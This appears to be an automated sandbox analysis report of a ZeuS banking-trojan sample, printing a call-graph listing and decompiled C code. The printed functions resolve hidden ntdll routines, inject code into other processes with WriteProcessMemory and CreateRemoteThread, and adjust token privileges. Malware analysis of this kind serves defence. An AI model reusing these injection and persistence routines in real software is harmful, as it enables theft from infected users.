40ca7a 13178->13182 13178->13183 13179->13175 13180->13175 13184 40c8fc StrCmpNIW 13181->13184 13185 409696 5 API calls 13182->13185 13183->12627 13184->13173 13186 40c914 13184->13186 13187 40ca91 13185->13187 13186->13173 13187->13183 13189 40bfbb 19 API calls 13187->13189 13189->13183 13190->13175 13191->13175 13197 40b651 13196->13197 13198 40b622 VirtualProtect 13196->13198 13197->12637 13198->13197 13201 406abb 13200->13201 13202 406ace 13200->13202 13203 405f54 4 API calls 13201->13203 13204 405f54 4 API calls 13202->13204 13205 406ac9 13203->13205 13204->13205 13206 406b01 13205->13206 13449 406a2d 13205->13449 13206->12627 13206->12647 13208 406af7 13209 4051e6 HeapFree 13208->13209 13209->13206 13455 405f1d 13211->13455 13213 406c83 13214 406c98 13213->13214 13460 406ca6 13213->13460 13214->12597 13217 
4051ce HeapAlloc 13216->13217 13218 405242 13217->13218 13218->13100 13220 41cd44 13219->13220 13221 4053f1 MultiByteToWideChar 13220->13221 13223 41cd93 13220->13223 13222 41cd6e 13221->13222 13222->13223 13224 40aa77 PathCombineW 13222->13224 13223->13114 13225 41cd81 13224->13225 13225->13223 13226 4053f1 MultiByteToWideChar 13225->13226 13226->13223 13228 4094e4 13227->13228 13229 40952b RegCloseKey 13227->13229 13230 4051b6 HeapAlloc 13228->13230 13234 4094eb 13228->13234 13229->13121 13231 4094f8 13230->13231 13231->13229 13232 4094ff RegQueryValueExW 13231->13232 13233 409523 13232->13233 13232->13234 13235 4051e6 HeapFree 13233->13235 13234->13229 13235->13229 13237 41c8ea 13236->13237 13238 40983f StringFromGUID2 13237->13238 13239 41c912 CreateMutexW 13238->13239 13240 41c929 GetLastError 13239->13240 13241 41c93f 13239->13241 13240->13241 13242 41c936 CloseHandle 13240->13242 13241->13133 13242->13241 13244 404fee 13243->13244 13245 404f8e 13243->13245 13244->13136 13252 41c9b9 13245->13252 13248 404fe6 CloseHandle 13248->13244 13249 404f9e CreateRemoteThread 13250 404fd8 VirtualFreeEx 13249->13250 13251 404fbd WaitForSingleObject CloseHandle 13249->13251 13250->13248 13251->13248 13267 409b46 IsBadReadPtr 13252->13267 13255 41c9da DuplicateHandle 13256 41c9f5 13255->13256 13257 41c9f9 WriteProcessMemory 13255->13257 13256->13257 13258 41ca28 13257->13258 13259 41ca2b WriteProcessMemory 13257->13259 13258->13259 13260 41ca49 13259->13260 13278 41c197 DuplicateHandle 13260->13278 13263 41c197 3 API calls 13264 41ca7b 13263->13264 13265 41ca87 VirtualFreeEx 13264->13265 13266 404f98 13264->13266 13265->13266 13266->13248 13266->13249 13268 409b73 VirtualAllocEx 13267->13268 13269 409b6c 13267->13269 13268->13269 13270 409b91 13268->13270 13269->13255 13269->13266 13271 405239 HeapAlloc 13270->13271 13277 409b98 13271->13277 13272 409c2a VirtualFreeEx 13272->13269 13273 409c1e 13274 4051e6 HeapFree 13273->13274 13275 409c24 13274->13275 13275->13269 
13275->13272 13276 409c07 WriteProcessMemory 13276->13273 13277->13272 13277->13273 13277->13276 13279 41c1c3 WriteProcessMemory 13278->13279 13280 41c1db 13278->13280 13279->13280 13281 41c1df DuplicateHandle 13279->13281 13280->13263 13281->13280 13283 4092b6 13282->13283 13284 4092a7 SetLastError 13282->13284 13285 4092b2 13283->13285 13286 4092bd CreateThread 13283->13286 13284->13285 13285->13143 13286->13285 13288 4051b6 HeapAlloc 13287->13288 13289 4184ac 13288->13289 13290 4051b6 HeapAlloc 13289->13290 13295 4184f1 13289->13295 13291 4184b9 13290->13291 13292 4092a2 2 API calls 13291->13292 13291->13295 13293 4184e6 13292->13293 13294 4092a2 2 API calls 13293->13294 13294->13295 13295->13146 13297 409303 13296->13297 13298 4092ed WaitForMultipleObjects 13296->13298 13297->13142 13297->13158 13298->13297 13300 408950 13299->13300 13301 40893f 13299->13301 13300->13162 13301->13300 13302 408946 CloseHandle 13301->13302 13302->13162 13304 41c0a7 13303->13304 13305 41c129 13303->13305 13306 405ed9 wvnsprintfW 13304->13306 13305->13175 13308 41c0cd 13306->13308 13307 41c11e LocalFree 13307->13305 13308->13307 13361 40930a RegOpenKeyExW 13308->13361 13311 41c0fe PathUnquoteSpacesW ExpandEnvironmentStringsW 13311->13307 13315 40a810 13312->13315 13313 40a824 GetFileAttributesW 13314 40a837 CreateDirectoryW 13313->13314 13313->13315 13314->13315 13315->13313 13316 40a855 13315->13316 13316->13175 13320 4096a2 13317->13320 13319 40aa77 PathCombineW 13319->13320 13320->13319 13321 4096e1 GetFileAttributesW 13320->13321 13322 4096d1 PathAddExtensionW 13320->13322 13323 4096f5 13320->13323 13372 409565 13320->13372 13321->13320 13321->13323 13322->13320 13322->13321 13323->13175 13325 40a402 6 API calls 13324->13325 13326 40bfd5 13325->13326 13327 40bff9 13326->13327 13328 40bffb 13326->13328 13329 40bfdf 13326->13329 13327->13175 13330 405239 HeapAlloc 13328->13330 13388 40bf6f 13329->13388 13333 40c007 13330->13333 13335 40a4aa 2 API calls 13333->13335 13334 40a4aa 2 
API calls 13334->13327 13336 40c011 13335->13336 13336->13327 13394 41ce4b 13336->13394 13339 40c030 13341 4051e6 HeapFree 13339->13341 13340 40bf6f 7 API calls 13340->13339 13341->13327 13343 40f34a 13342->13343 13344 40c0fc LoadLibraryW 13343->13344 13345 40c110 13344->13345 13346 40c1eb 13344->13346 13347 40c11f GetProcAddress 13345->13347 13346->13190 13416 40f314 13347->13416 13350 40f314 13351 40c154 GetProcAddress 13350->13351 13352 40c1e0 FreeLibrary 13351->13352 13353 40c164 13351->13353 13352->13346 13353->13352 13418 4068b2 GetCurrentThread OpenThreadToken 13353->13418 13356 40c185 13426 40c077 13356->13426 13358 40c1da 13358->13352 13359 40c192 13359->13352 13359->13358 13360 40c077 17 API calls 13359->13360 13360->13359 13362 409329 13361->13362 13365 40933f 13361->13365 13371 409432 RegQueryValueExW RegCloseKey 13362->13371 13364 409360 13364->13307 13364->13311 13365->13364 13366 4055a2 HeapAlloc 13365->13366 13367 409395 13366->13367 13368 4093aa 13367->13368 13369 40939b ExpandEnvironmentStringsW 13367->13369 13370 4051e6 HeapFree 13368->13370 13369->13368 13370->13364 13371->13365 13382 40656b 13372->13382 13383 406579 13382->13383 13384 406574 13382->13384 13386 40651f GetTickCount 13383->13386 13385 40651f GetTickCount 13384->13385 13385->13383 13387 40652d 13386->13387 13387->13387 13389 40bf9a SetFileAttributesW 13388->13389 13398 40a39d CreateFileW 13389->13398 13392 40bfaf 13392->13334 13393 40bf89 Sleep 13393->13389 13395 41ce69 13394->13395 13396 40c01f 13395->13396 13407 40b4f9 13395->13407 13396->13339 13396->13340 13399 40a3c4 13398->13399 13400 40a3fa 13398->13400 13401 40a3e4 13399->13401 13402 40a3ce WriteFile 13399->13402 13400->13392 13400->13393 13403 40a3e6 CloseHandle 13401->13403 13402->13401 13402->13403 13403->13400 13404 40a3f2 13403->13404 13406 40a548 SetFileAttributesW DeleteFileW 13404->13406 13406->13400 13408 40b513 13407->13408 13409 40b50f 13407->13409 13411 4067c3 13408->13411 13409->13396 13412 4067f9 13411->13412 
13413 4067cc 13411->13413 13412->13409 13413->13412 13414 40656b GetTickCount 13413->13414 13415 4067d7 Sleep 13413->13415 13414->13413 13415->13413 13417 40c13c GetProcAddress 13416->13417 13417->13350 13419 4068d3 OpenProcessToken 13418->13419 13420 4068e9 LookupPrivilegeValueW 13418->13420 13419->13420 13424 4068e5 WTSGetActiveConsoleSessionId 13419->13424 13421 406909 AdjustTokenPrivileges 13420->13421 13422 40692a CloseHandle 13420->13422 13421->13422 13423 40691e GetLastError 13421->13423 13422->13424 13423->13422 13425 406928 13423->13425 13424->13356 13424->13359 13425->13422 13427 40c084 13426->13427 13428 40c0e4 13427->13428 13429 4088d5 5 API calls 13427->13429 13428->13359 13430 40c091 13429->13430 13431 40c097 EqualSid 13430->13431 13432 40c0da CloseHandle 13430->13432 13433 40c0a6 13431->13433 13437 40c0d3 13431->13437 13432->13428 13435 405f54 4 API calls 13433->13435 13434 4051e6 HeapFree 13434->13432 13436 40c0bb 13435->13436 13436->13437 13441 406b08 LoadLibraryA 13436->13441 13437->13434 13440 4051e6 HeapFree 13440->13437 13442 406b2a GetProcAddress GetProcAddress 13441->13442 13443 406bec 13441->13443 13444 406be1 FreeLibrary 13442->13444 13445 406b51 13442->13445 13443->13440 13444->13443 13445->13444 13446 406b91 CreateProcessAsUserW 13445->13446 13447 406bbf CloseHandle CloseHandle 13446->13447 13448 406bd6 13446->13448 13447->13448 13448->13444 13450 406a40 13449->13450 13451 406a5f CreateProcessW 13450->13451 13452 406a81 13451->13452 13453 406a7c 13451->13453 13452->13208 13453->13452 13454 406a91 CloseHandle CloseHandle 13453->13454 13454->13452 13456 405f25 13455->13456 13457 405f29 13455->13457 13456->13213 13458 405f30 wvnsprintfA 13457->13458 13459 405f48 13458->13459 13459->13213 13478 40a569 GetTempPathW 13460->13478 13463 406da1 13463->13214 13464 406cc8 CharToOemW 13465 405faa 4 API calls 13464->13465 13466 406cf4 13465->13466 13467 406da8 13466->13467 13469 40a39d 5 API calls 13466->13469 13485 40a548 SetFileAttributesW 
DeleteFileW 13467->13485 13470 406d11 13469->13470 13471 4051e6 HeapFree 13470->13471 13472 406d1b 13471->13472 13472->13467 13473 405ed9 wvnsprintfW 13472->13473 13474 406d41 13473->13474 13474->13467 13475 406d49 GetEnvironmentVariableW 13474->13475 13475->13467 13476 406d68 13475->13476 13477 406aad 7 API calls 13476->13477 13477->13463 13480 40a58e 13478->13480 13484 406cc0 13478->13484 13479 40651f GetTickCount 13479->13480 13480->13479 13481 405ed9 wvnsprintfW 13480->13481 13482 40aa77 PathCombineW 13480->13482 13483 40a39d 5 API calls 13480->13483 13480->13484 13481->13480 13482->13480 13483->13480 13484->13463 13484->13464 13485->13463

Executed Functions

Control-flow Graph

C-Code - Quality: 87%
			E0041C53B(signed char __ecx, void* __edx) {
				char _v481;
				char _v828;
				char _v1220;
				char _v1240;
				intOrPtr _v1248;
				intOrPtr _v1252;
				signed char _v1256;
				intOrPtr _v1260;
				signed char _v1264;
				struct HINSTANCE__* _v1268;
				intOrPtr _v1272;
				void* __edi;
				void* __esi;
				signed int _t43;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t50;
				_Unknown_base(*)()* _t56;
				void* _t57;
				signed int _t60;
				void** _t61;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				void* _t76;
				intOrPtr _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				struct HINSTANCE__* _t84;
				int _t86;
				signed int _t89;
				void* _t92;
				signed int* _t94;
				WCHAR* _t98;
				void* _t99;
				signed int* _t101;

				_t92 = __edx;
				_t90 = __ecx;
				_v1264 = __ecx;
				_t86 = 0;
				_t2 =  &_v1264;
				 *_t2 = _v1264 & 0x00000001;
				_v1256 = __ecx;
				if( *_t2 == 0) {
					 *0x4239b0 = 0;
				}
				_t94 = E0041C1F6();
				 *0x4239c8 = _t94;
				if(_t94 == _t86) {
					L26:
					_t43 = 0;
				} else {
					if(_v1264 != _t86) {
						_v1256 = E0041C130(_t90, _t92, _t94, "GetProcAddress");
						_v1256 = E0041C130(_t90, _t92, _t94, "LoadLibraryA");
						_t46 =  *0x4239c4;
						_v1268 = _t46;
						_t90 =  *((intOrPtr*)(_t46 + 0x3c)) + _t46 + 0x80;
						__eflags = _v1256 - _t86;
						if(_v1256 == _t86) {
							goto L20;
						} else {
							__eflags = _v1252 - _t86;
							if(_v1252 == _t86) {
								goto L20;
							} else {
								_t94 =  *_t90;
								__eflags = _t94 - _t86;
								if(_t94 <= _t86) {
									goto L20;
								} else {
									__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14;
									if( *((intOrPtr*)(_t90 + 4)) <= 0x14) {
										goto L20;
									} else {
										_t94 = _t94 + _t46;
										__eflags =  *_t94 - _t86;
										if( *_t94 == _t86) {
											goto L20;
										} else {
											while(1) {
												_t80 = _v1248(_t94[3] + _v1260);
												_v1248 = _t80;
												__eflags = _t80 - _t86;
												if(_t80 == _t86) {
													goto L26;
												}
												_t101 =  *_t94 + _v1264;
												_t89 = _t94[4] + _v1264;
												while(1) {
													_t81 =  *_t101;
													__eflags = _t81;
													if(__eflags == 0) {
														break;
													}
													if(__eflags >= 0) {
														_t90 = _v1264;
														_t82 = _t81 + _v1264 + 2;
													} else {
														_t82 = _t81 & 0x0000ffff;
													}
													_t83 = _v1256(_v1248, _t82);
													__eflags = _t83;
													if(_t83 == 0) {
														goto L26;
													} else {
														 *_t89 = _t83;
														_t101 =  &(_t101[1]);
														_t89 = _t89 + 4;
														__eflags = _t89;
														continue;
													}
													goto L46;
												}
												_t94 =  &(_t94[5]);
												_t86 = 0;
												__eflags =  *_t94;
												if( *_t94 != 0) {
													continue;
												} else {
													goto L20;
												}
												goto L46;
											}
											goto L26;
										}
									}
								}
							}
						}
					} else {
						_t84 = GetModuleHandleW(_t86);
						 *0x4239c4 = _t84;
						if(_t84 == _t86) {
							goto L26;
						} else {
							L20:
							_t98 =  &_v1240;
							E0040F34A(0xe5, _t98);
							_t50 = GetModuleHandleW(_t98);
							 *0x4239cc = _t50;
							if(_t50 == _t86) {
								goto L26;
							} else {
								_t99 = GetProcAddress;
								 *0x4239d0 = GetProcAddress(_t50, "NtCreateThread");
								 *0x4239d4 = GetProcAddress( *0x4239cc, "NtCreateUserProcess");
								 *0x4239d8 = GetProcAddress( *0x4239cc, "NtQueryInformationProcess");
								 *0x4239dc = GetProcAddress( *0x4239cc, "RtlUserThreadStart");
								 *0x4239e0 = GetProcAddress( *0x4239cc, "LdrLoadDll");
								_t56 = GetProcAddress( *0x4239cc, "LdrGetDllHandle");
								 *0x4239e4 = _t56;
								if( *0x4239d0 != _t86 ||  *0x4239d4 != _t86) {
									if( *0x4239d8 == _t86 ||  *0x4239e0 == _t86 || _t56 == _t86) {
										goto L26;
									} else {
										_t57 = HeapCreate(_t86, 0x80000, _t86); // executed
										 *0x4231a4 = _t57;
										__eflags = _t57 - _t86;
										if(_t57 != _t86) {
											 *0x4223b3 = 1;
										} else {
											 *0x4231a4 = GetProcessHeap();
											 *0x4223b3 = 0;
										}
										 *0x4227d8 = _t86;
										 *0x4223b2 = 0;
										InitializeCriticalSection(0x423870);
										 *0x423888 = _t86; // executed
										__imp__#115(0x202,  &_v1220); // executed
										_t60 = E0041C230(_v1264, _t90, _t94, _t99);
										__eflags = _t60;
										if(_t60 == 0) {
											goto L26;
										} else {
											__eflags = _v1272 - _t86;
											if(_v1272 != _t86) {
												L33:
												_t61 = E004067FD(_t90, 0xffffffff, 0x4239c0);
												 *0x4239b4 = _t61;
												__eflags = _t61 - _t86;
												if(_t61 == _t86) {
													goto L26;
												} else {
													 *0x4239b8 = GetLengthSid( *_t61);
													 *0x4239bc = E00406595( *( *0x4239b4), _t62);
													_t65 = E0041C2AF(_t64, _v1272);
													__eflags = _t65;
													if(_t65 == 0) {
														goto L26;
													} else {
														 *0x423c20 = GetCurrentProcessId();
														 *0x423c24 = _t86;
														__eflags = _v1272 - _t86;
														if(_v1272 != _t86) {
															_t67 = 1;
														} else {
															_t67 = E0041C311();
														}
														__eflags = _t67;
														if(_t67 == 0) {
															goto L26;
														} else {
															__eflags = _v1272 - _t86;
															if(_v1272 == _t86) {
																E0041CC1D( &_v828);
																_t90 = 0x423e1e;
																E0040983F(0x423e1e, 0x423c28,  *0x4239bc,  &_v481, _t86);
															}
															_t68 = E0041C363(_v1264);
															__eflags = _t68;
															if(_t68 == 0) {
																goto L26;
															} else {
																__eflags = _v1264 & 0x00000002;
																 *0x4231b4 = _t86;
																 *0x423460 = 0;
																 *0x4231d0 = 0;
																 *0x423fc8 = 0;
																 *0x423f60 = 0;
																 *0x423ef8 = 0;
																 *0x423e90 = 0;
																if(__eflags == 0) {
																	_t70 = 1;
																} else {
																	_t70 = E0041C41A(_t90, _t92, __eflags);
																}
																__eflags = _t70;
																_t41 = _t70 != 0;
																__eflags = _t41;
																_t43 = _t70 & 0xffffff00 | _t41;
															}
														}
													}
												}
											} else {
												_t76 = CreateEventW(0x4239e8, 1, _t86, _t86);
												 *0x423e78 =  *0x423e78 | 0xffffffff;
												 *0x423e74 = _t76;
												__eflags = _t76 - _t86;
												if(_t76 == _t86) {
													goto L26;
												} else {
													goto L33;
												}
											}
										}
									}
								} else {
									goto L26;
								}
							}
						}
					}
				}
				L46:
				return _t43;
			}

APIs
  • GetModuleHandleW.KERNEL32(00000000), ref: 0041C57D
  • GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress), ref: 0041C653
  • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0041C672
  • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0041C684
  • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0041C696
  • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0041C6A8
  • GetProcAddress.KERNEL32(LdrLoadDll), ref: 0041C6BA
  • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0041C6CC
  • HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 0041C705
  • GetProcessHeap.KERNEL32 ref: 0041C714
  • InitializeCriticalSection.KERNEL32(00423870), ref: 0041C741
  • WSAStartup.WS2_32(00000202,?), ref: 0041C757
  • CreateEventW.KERNEL32(004239E8,00000001,00000000,00000000), ref: 0041C779
  • GetLengthSid.ADVAPI32(00000000,000000FF,004239C0), ref: 0041C7AE
  • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0041C7DC
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
  • String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
  • API String ID: 3091071419-305303173
  • Opcode ID: 608c3f0affc6f641294315a38c12ce926712a363d8bb0f0cb6ac6950368ce823
  • Instruction ID: b58e52cdb82bd401bb79be55b4580564e9b01dec325ab19b2c58fd0f232bc349
  • Opcode Fuzzy Hash: 608c3f0affc6f641294315a38c12ce926712a363d8bb0f0cb6ac6950368ce823
  • Instruction Fuzzy Hash: 10918DB0A443419FCB20AF64DDC56AA7BB0BB49306F50183FE545A3261D77D9986CF0E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
C-Code - Quality: 79%
			E004087D5(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

APIs
  • InitializeSecurityDescriptor.ADVAPI32(004239F4,00000001,?,0041C766), ref: 004087DF
  • SetSecurityDescriptorDacl.ADVAPI32(004239F4,00000001,00000000,00000000), ref: 004087F0
  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00408806
  • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000001,?), ref: 00408822
  • SetSecurityDescriptorSacl.ADVAPI32(004239F4,?,00000001,?), ref: 00408836
  • LocalFree.KERNEL32(00000000), ref: 00408843
Similarity
  • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
  • String ID: S:(ML;;NRNWNX;;;LW)
  • API String ID: 2050860296-820036962
  • Opcode ID: e1bf71e0b886f02c4c75f81a3a1d31ea4edfe25e9a5fadab01403aa761a9b0fa
  • Instruction ID: 43bb6bc1dd1668e945618ef07835c5c1d6e75c3254577ced12ecb25565ed7e5c
  • Opcode Fuzzy Hash: e1bf71e0b886f02c4c75f81a3a1d31ea4edfe25e9a5fadab01403aa761a9b0fa
  • Instruction Fuzzy Hash: BE112472A00209FFEB11AFA18E85EAFBBBCAF04740F50447EF591F11A0DB759A409B14
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
C-Code - Quality: 100%
			_entry_(void* __edx, void* __eflags, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				signed int _t36;
				void* _t51;

				_t51 = __fp0;
				_t34 = 0;
				_t33 = 0; // executed
				_t22 = E0041C53B(0, __edx); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E0041D16A(_t34, __eflags, _t51, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x4239b0 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t36 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t48 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E0040D74C(_t36);
						_t29 = E004179C2();
						__eflags =  *0x4239b0 & 0x00000004;
						_t33 = _t29;
						if(( *0x4239b0 & 0x00000004) != 0) {
							_t29 = E0040D5C5(0x423238, 0);
						}
						goto L21;
					}
					_t29 = E0041CF7B(_t48);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t36 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t36 = _t36 + 1;
				} while (_t36 < _v12);
				goto L14;
			}

APIs
    • Part of subcall function 0041C53B: GetModuleHandleW.KERNEL32(00000000), ref: 0041C57D
    • Part of subcall function 0041C53B: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress), ref: 0041C653
    • Part of subcall function 0041C53B: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0041C672
    • Part of subcall function 0041C53B: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0041C684
    • Part of subcall function 0041C53B: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0041C696
    • Part of subcall function 0041C53B: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0041C6A8
    • Part of subcall function 0041C53B: GetProcAddress.KERNEL32(LdrLoadDll), ref: 0041C6BA
    • Part of subcall function 0041C53B: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0041C6CC
  • SetErrorMode.KERNEL32(00008007), ref: 0041D497
  • GetCommandLineW.KERNEL32(?), ref: 0041D4A1
  • CommandLineToArgvW.SHELL32(00000000), ref: 0041D4A8
  • LocalFree.KERNEL32(00000000), ref: 0041D4FD
  • Sleep.KERNEL32(000000FF,?,00000001), ref: 0041D553
  • ExitProcess.KERNEL32 ref: 0041D564
Similarity
  • API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
  • String ID: 82B
  • API String ID: 1184560534-2694519287
  • Opcode ID: 2e2f242e093cacd0e8f96f74c3cc499f020e76e2bc3b12c98483432f52749cd1
  • Instruction ID: 8ad9bc9191da2c70f5093ce8fcf59ba3170b91a6cef4f3572feb8d2c514eebee
  • Opcode Fuzzy Hash: 2e2f242e093cacd0e8f96f74c3cc499f020e76e2bc3b12c98483432f52749cd1
  • Instruction Fuzzy Hash: 5D21F6F0D44280B6CF199BBC89187FF3BA26F02308F18419BE4416A2A2D77D65C9C71E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 53%
			E00409789() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E00405299(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

APIs
  • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,?), ref: 004097A8
  • PathAddBackslashW.SHLWAPI(?), ref: 004097BF
  • PathRemoveBackslashW.SHLWAPI(?), ref: 004097D0
  • PathRemoveFileSpecW.SHLWAPI(?), ref: 004097DD
  • PathAddBackslashW.SHLWAPI(?), ref: 004097EE
  • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 004097FD
  • CLSIDFromString.OLE32(?,?), ref: 00409817
Similarity
  • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
  • String ID:
  • API String ID: 613918483-0
  • Opcode ID: d1423d0448c120e1eae1545c5b3dd51aa8f7cd6c15aa39ff12daa3fcc1aee5ed
  • Instruction ID: b6f9700567c46511afd2d5ef890a02f06087d17cb85ad7f4e5f257f7c7c28547
  • Opcode Fuzzy Hash: d1423d0448c120e1eae1545c5b3dd51aa8f7cd6c15aa39ff12daa3fcc1aee5ed
  • Instruction Fuzzy Hash: 4911727290420CAADB20DFB1DC88EDB77ACAB05344F14447AA510F3261E635EE489B64
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Control-flow Graph
C-Code - Quality: 38%
			E0040E31C(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				void* _t239;
				void* _t248;
				unsigned int _t260;
				intOrPtr* _t262;
				signed short _t263;
				intOrPtr _t264;
				WCHAR** _t265;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				void* _t275;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
